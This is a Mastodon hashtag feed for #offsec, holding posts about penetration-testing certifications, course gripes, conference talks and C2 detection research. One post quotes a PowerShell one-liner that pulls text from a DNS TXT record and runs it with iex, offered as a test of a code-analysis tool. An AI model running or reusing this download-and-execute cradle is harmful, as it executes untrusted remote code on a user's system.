writing.exchange is one of the many independent Mastodon servers you can use to participate in the fediverse.
A small, intentional community for poets, authors, and every kind of writer.

Administered by:

Server stats:

325
active users

#offsec

0 posts0 participants0 posts today
nemo™ 🇺🇦<p>The <a href="https://mas.to/tags/Offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Offsec</span></a> <a href="https://mas.to/tags/OSCP" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>OSCP</span></a> song Try <a href="https://mas.to/tags/Harder" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Harder</span></a></p><p><a href="https://youtu.be/t-bgRQfeW64" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="">youtu.be/t-bgRQfeW64</span><span class="invisible"></span></a> </p><p><a href="https://mas.to/tags/nemoradio" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>nemoradio</span></a></p>
Shawn Webb<p>Cool research by my coworkers at IOActive: <a href="https://www.wired.com/story/digital-license-plate-jailbreak-hack/" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">wired.com/story/digital-licens</span><span class="invisible">e-plate-jailbreak-hack/</span></a></p><p><a href="https://bsd.network/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://bsd.network/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a></p>
Jarrod<p>Really happy with what I accomplished this year. Tackled the OSCP, OSWP, and finished my first HackTheBox Pro Lab Dante. Looking forward to what I accomplish in 2025. <a href="https://infosec.exchange/tags/ethicalhacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ethicalhacking</span></a> <a href="https://infosec.exchange/tags/HackTheBox" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>HackTheBox</span></a> <a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>CyberSecurity</span></a> <a href="https://infosec.exchange/tags/OffSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>OffSec</span></a></p>
Shawn Webb<p>I'm doing a security code review of a service that uses Smithy ( <a href="https://smithy.io/2.0/quickstart.html" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="">smithy.io/2.0/quickstart.html</span><span class="invisible"></span></a> ).</p><p>This is the first time I've come across Smithy. Does anyone know of any security issues of Smithy models/code that I should be aware of?</p><p><a href="https://bsd.network/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://bsd.network/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a> <a href="https://bsd.network/tags/pentest" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>pentest</span></a> <a href="https://bsd.network/tags/codereview" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>codereview</span></a></p>
Florian<p>been working through <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a>'s <a href="https://infosec.exchange/tags/pen200" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>pen200</span></a> as of late and I'm honestly a little appalled about how ...bad it is?<br>Don't get me wrong, the approach is pretty good. I like how we read text/watch video, and then get to do the commands in a more practical fashion. ANd I'd even say some of the labs are actually pretty fun/educational. But the text! :-O<br>"XYZ can be helpful to pen test. We can use netcat. We can also use this script in random_programming_language_you_may_not_even_remotely_know" Question: Use this tool we haven't at all mentioned so far to do a tangentially related thing to the thing you just learned". <br>I get that they are going for the whole " Try Harder" approach where you just have to go look things up and go the extra mile but there is a point where you go from " Let thet student do some extra work" to " Structure? What is structure? I can't be f*cked to make this flow well and make it make sense, let's just shove it in the Try Harder category".<br>Don't get me wrong, I'm not complaining because I'm stuck or whatever, I just feel this could have been done SO MUCH BETTER <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a></p>
Lucid.H3X<p><a href="https://defcon.social/tags/introduction" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>introduction</span></a> </p><p>Hi My name is Lucid.H3X im a Infosec nut! I love all things security and tech. My main interests are in WIFI and Cloud based Security as well AI since its the New cutting edge of the cyberworld not to mention I have a huge fascination for malware and how its made and works as well. I also enjoy playing old retro 8bit games It's kinda a problem. When I'm not studying for a cert or in some rabbit hole hacking and tinkering. You can find me most likely out and about at local furry meets or hanging out with my family. FOSS and Crypto supporter ❣️</p><p>If you love <a href="https://defcon.social/tags/wardriving" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>wardriving</span></a> <a href="https://defcon.social/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://defcon.social/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://defcon.social/tags/furry" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>furry</span></a> <a href="https://defcon.social/tags/retrogames" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>retrogames</span></a> <a href="https://defcon.social/tags/retrogaming" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>retrogaming</span></a> and all things <a href="https://defcon.social/tags/tech" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>tech</span></a> and <a href="https://defcon.social/tags/privacy" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>privacy</span></a> <a href="https://defcon.social/tags/hacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>hacking</span></a> <a href="https://defcon.social/tags/osint" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>osint</span></a> <a href="https://defcon.social/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a> related then add me!</p><p>PS I'm a pretty big dork and tend to go on huge rants so be warned ahead of time nerds!</p><p>Stay Fluffy and Nerdy,</p><p>Lucid.H3X</p>
BSidesNYC<p><span class="h-card" translate="no"><a href="https://infosec.exchange/@BSidesNYC" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>BSidesNYC</span></a></span> 0x03 Recap: In this session, François Proulx discusses what goes on behind the scenes of <a href="https://infosec.exchange/tags/supplychainattacks" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>supplychainattacks</span></a> through the lens of SLSA (Supply chain Levels for Software Artifacts), a threat model designed to tackle these emergent threats.</p><p><a href="https://www.youtube.com/watch?v=gpqLgEqp_jA" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">youtube.com/watch?v=gpqLgEqp_j</span><span class="invisible">A</span></a></p><p><a href="https://infosec.exchange/tags/securityconference" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>securityconference</span></a> <a href="https://infosec.exchange/tags/learncybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>learncybersecurity</span></a> <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a></p>
al3x<p>so, <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a> friends: i’m looking at an active credential harvesting website found from phishing emails and i wanna make sure i’m not missing anything. any suggestions on directory discovery tools that are possibly not too noisy? what are people’s thoughts on dirhunt?</p>
Shawn Webb<p>It even works with processes that have entered Capabilities Mode.</p><p><a href="https://bsd.network/tags/FreeBSD" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>FreeBSD</span></a> <a href="https://bsd.network/tags/Capsicum" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Capsicum</span></a> <a href="https://bsd.network/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://bsd.network/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a> <a href="https://bsd.network/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a></p>
Thomas Dang :verified:<p>48hrs, delivery meals for two days, and a little less sleep than I would have liked but pleased to share I am OSEP certified. </p><p>The course prepared me with the knowledge I needed, combined with using Sliver as my C2, this was a hard exam but I learned a lot during the course. </p><p><a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a> <a href="https://infosec.exchange/tags/OSEP" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>OSEP</span></a></p>
Christopher Bauer :debian: :i3wm: :blobcatthinkingglare:<p>Using Discord as a repository of knowledge/service desk makes life so much more challenging. I know its been said around here before. </p><p>I just spent hour sifting through, and trying to piece together, fragments of conversations on potato exploits in a challenge in offsec's PEN-200 course. I gradually realized everyone else was as in the dark as I was; they'd only globed onto the potato exploits by the fragments of others, and so it will go for those after me.:blobcatgooglycry:​ Its potato exploits all the way down.</p><p>Blurg. <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a></p>
Florian<p>SO ... to illustrate how big the gap is between <a href="https://infosec.exchange/tags/Windows" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Windows</span></a> and <a href="https://infosec.exchange/tags/Linux" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Linux</span></a> <a href="https://infosec.exchange/tags/accessibility" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>accessibility</span></a> where GUI is concerned, I am working on going through the <a href="https://infosec.exchange/tags/offSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offSec</span></a> <a href="https://infosec.exchange/tags/OSCP" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>OSCP</span></a> material and they only allow a single connection to their VPN at a time. You need to start exeercise and lab VMS from WITHIN the VPN in order to have it be reachable from within the VPN. If you do it outside the VPN, you have to work using their browser-based <a href="https://infosec.exchange/tags/kali" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>kali</span></a> box, which is inaccessible or <a href="https://infosec.exchange/tags/screenReader" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>screenReader</span></a> users. Starting the exercises from Firefox on the Kali guest proved problematic, so in the end I had to set my VM's networking to NAT and use ssh -L to forward reverse shells down the pipeline in order to not have to constantly swap the VPN between Windows and kali. Is it any wonder we don't have <a href="https://infosec.exchange/tags/screenreader" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>screenreader</span></a> users in <a href="https://infosec.exchange/tags/infoSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infoSec</span></a> with all these barriers, on top of all the <a href="https://infosec.exchange/tags/atekeeping" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>atekeeping</span></a> that is already happening in the industry? Blog post material, perhaps ... 🤔</p>
vpz<p>It's been a few years in the making but today I achieved the OffSec Certified Expert 3 (OSCE3) certification after getting OSCP, OSEP, OSWE, and OSED. Took a lot of hours on top of work and family to make this happen. Very happy with the journey and the closure of this chapter. Next year will start fresh with a new big, scary goal and start that journey. But today I'm going to celebrate. <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a></p>
averagesecurityguy<p>It's been about a week since this happened so I'm probably cool-headed enough to talk about it. First a little background info.</p><p>A sales person from Offensive Security (<a href="https://www.offsec.com/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="">offsec.com/</span><span class="invisible"></span></a>) has been trying to reach out to me for days. First by work email, which I ignored, then through my personal LinkedIn account, which I also ignored.</p><p>Then, last week, my son texts me and says, "some guy called me looking for you." I told him I was your son and he said he would try to email. I know that absolutely no one in my professional circle has my son's personal cell number, so I asked him to send me the number that called him.</p><p>I call the number back and it's the sales guy from Offensive Security. I immediately asked him how he got my son's number and found out it was part of a ZoomInfo (<a href="https://www.zoominfo.com/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="">zoominfo.com/</span><span class="invisible"></span></a>) record for me. I told him to immediately delete any record he has with my son's information.</p><p>I then let him know in no uncertain terms that his company was using some shady data gathering practices if they had my son's cell number and because of that I will personally never do business with OffSec again. I also made it clear that he should never reach out to me again.</p><p>Even though I hold the <a href="https://infosec.exchange/tags/OSCP" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>OSCP</span></a> and <a href="https://infosec.exchange/tags/OSCE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>OSCE</span></a> certifications and even though they were a career changer for me and for my colleagues, I will no longer do business with their company.</p><p><a href="https://infosec.exchange/tags/OffSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>OffSec</span></a> <a href="https://infosec.exchange/tags/OffensiveSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>OffensiveSecurity</span></a></p>
0xor0ne<p>Nice blog post for understanding Sliver C2 internals (from a threat hunter prospective)</p><p><a href="https://immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="ellipsis">immersivelabs.com/blog/detecti</span><span class="invisible">ng-and-decrypting-sliver-c2-a-threat-hunters-guide/</span></a></p><p><a href="https://infosec.exchange/tags/sliver" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>sliver</span></a> <a href="https://infosec.exchange/tags/redteam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>redteam</span></a> <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a> <a href="https://infosec.exchange/tags/secops" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>secops</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a></p>
Still<p>The Code Insight feature @virustotal@twitter.com launched is... something I guess? It unfortunately still fails to grasp various basic cmdlets from PowerShell and gives misleading results. I fed it a simple <code>(resolve-dnsname stillu.cc -type txt|?{$_.strings-match'get'}).strings |iex</code> and it spat out... whatever this is.</p><p><a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a></p>
Shawn Webb<p>I just finished the introductory article on my new offensive security project, aptly named Offensive-OpenSSL:</p><p><a href="https://git.hardenedbsd.org/shawn.webb/articles/-/blob/master/infosec/offensive-openssl/2023-02-03_introduction/article.md" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="ellipsis">git.hardenedbsd.org/shawn.webb</span><span class="invisible">/articles/-/blob/master/infosec/offensive-openssl/2023-02-03_introduction/article.md</span></a></p><p><a href="https://bsd.network/tags/OpenSSL" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>OpenSSL</span></a> <a href="https://bsd.network/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://bsd.network/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a> <a href="https://bsd.network/tags/HardenedBSD" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>HardenedBSD</span></a></p>
alexia<p>I am proud of myself because today I got my first root shell on a prod network! :blobfoxcomputerowonotice:</p><p>Some of you may remember back when I only dreamed of hacking for my day job. Many people supported me in various ways like by being welcoming and helpful, providing mentorship, and boosting my work/words. <a href="https://hachyderm.io/tags/InfosecTwitter" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>InfosecTwitter</span></a> (RIP) was a huge part of my journey. </p><p><a href="https://hachyderm.io/tags/hacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>hacking</span></a> <a href="https://hachyderm.io/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://hachyderm.io/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a></p>
Chase :loading:<p>Always interesting to see blue teamers write up <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a> tools I’ve written. I like how they spent time figuring our TCP packets out to write a snort rule. </p><p><a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/security" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>security</span></a> <a href="https://infosec.exchange/tags/pentesting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>pentesting</span></a> <a href="https://infosec.exchange/tags/blueteam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>blueteam</span></a> <a href="https://infosec.exchange/tags/redteam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>redteam</span></a> </p><p><a href="https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">trendmicro.com/en_us/research/</span><span class="invisible">22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html</span></a></p>
Bishop Fox<p>Just a few weeks until <span class="h-card"><a href="https://infosec.exchange/@cactuscon" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>cactuscon</span></a></span> 11! We can't wait; <span class="h-card"><a href="https://infosec.exchange/@dnsprincess" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>dnsprincess</span></a></span> is presenting, there will be plenty of 🦊 swag on hand, and you can chat with our team about <a href="https://infosec.exchange/tags/infosecjobs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosecjobs</span></a> at Bishop Fox or our industry-leading <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>offsec</span></a> solutions. <a href="https://bishopfox.com/events/cactuscon-11" rel="nofollow noopener noreferrer" target="_blank"><span class="invisible">https://</span><span class="ellipsis">bishopfox.com/events/cactuscon</span><span class="invisible">-11</span></a></p>